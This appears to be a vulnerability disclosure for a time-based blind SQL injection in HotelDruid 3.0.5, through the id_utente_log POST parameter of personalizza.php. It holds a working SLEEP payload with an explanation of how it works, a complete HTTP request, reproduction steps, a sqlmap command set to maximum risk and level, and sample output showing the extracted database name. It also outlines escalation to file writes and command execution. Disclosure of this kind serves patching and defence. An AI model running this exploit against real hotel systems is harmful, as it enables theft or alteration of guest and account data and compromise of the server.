Affected Version: hoteldruid version 3.0.5
Security Issue:
SQL injection via POST parameter id_utente_log
URL: http://localhost/hoteldruid/personalizza.php
Method: POST
Vulnerable Parameter: id_utente_log
Payload: 0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'
URL-decoded: 0'+(SELECT 7151 FROM (SELECT(SLEEP(5)))EAXh)+'
This is a MySQL time-based blind payload: the leading quote closes the string literal the parameter is placed in, the + appends a subquery that calls SLEEP(5), and the trailing quote reopens the literal so the statement still parses. A vulnerable server answers roughly 5 seconds later than it does for a harmless value such as 0.
Vulnerability Description:
SQL injection (SQLi) is an injection attack in which attacker-controlled input is concatenated into an SQL statement, so the attacker can run SQL of their choosing against the web application's database. Here the id_utente_log POST parameter reaches the query without escaping or parameter binding. The injection is blind: nothing from the query is reflected in the page, so it is detected and exploited through the delay introduced by SLEEP().
Process to reproduce:
1. Copy the HTTP request below.
2. Save it as sqli_2.txt, keeping the blank line between the headers and the body (sqlmap -r needs it to find the body).
3. Run the sqlmap command below; the extracted data appears in its output. Because the technique is time-based, each extracted character costs several seconds.
HTTP Request:
POST /hoteldruid/personalizza.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://localhost/hoteldruid/
Content-Length: 154
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: localhost
Connection: keep-alive

aggiorna_qualcosa=SI&anno=2023&attiva_phpr_log=Enable&id_sessione=1&id_utente_log=0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'&id_utente_mod=1
HTTP Response:
Proof of Exploit:
SQL query - SELECT database()
hoteldruid
Screenshot:
Command used: sqlmap -r sqli_2.txt -p id_utente_log --risk 3 --level 5 --dbs --current-user --current-db
The impact of this vulnerability:
An attacker can use this injection to read the entire hoteldruid database (the proof above already returns the current database name) and to bypass the application's authentication and authorization checks by querying or altering account data. SQLi can also add, modify and delete records, affecting data integrity. Where the database account has file-system privileges (for MySQL, the FILE privilege combined with a writable web root), the injection can be escalated to writing files on the server and from there to OS command execution.